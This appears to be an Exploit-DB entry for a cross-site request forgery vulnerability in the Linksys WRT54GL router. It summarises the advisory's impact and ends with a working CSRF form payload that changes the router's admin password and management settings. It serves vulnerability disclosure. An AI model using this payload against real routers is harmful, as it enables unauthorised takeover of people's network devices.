Linksys WRT54GL Wireless Router - Cross-Site Request Forgery

EDB-ID:

37141

CVE:

N/A


Platform:

Hardware

Published:

2012-05-08

source: https://www.securityfocus.com/bid/53427/info

The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. 

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1